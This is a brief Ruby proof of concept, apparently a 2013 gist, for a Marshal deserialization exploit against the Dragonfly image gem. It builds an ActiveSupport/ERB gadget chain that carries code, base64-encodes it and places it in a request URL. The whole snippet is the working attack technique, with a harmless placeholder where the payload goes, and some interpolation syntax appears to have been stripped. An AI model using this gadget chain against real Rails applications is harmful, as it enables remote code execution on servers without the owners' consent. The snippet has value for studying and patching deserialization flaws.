Created November 14, 2013 09:04
Dragonfly marshal exploit PoC
# If responds, then:
string = "Here's a scary exploit"
code = "{string.inspect})"
marshalled = "\x04\x08o:\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0E@instanceo:\x08ERB\x06:\x09@src" + Marshal.dump(code)[2..-1] + ":\x0C@method:\x0Bresult"
base64ed = Base64.encode64(marshalled).tr("\n=",'').tr('/','~')
url = "{base64ed}/basename.format"
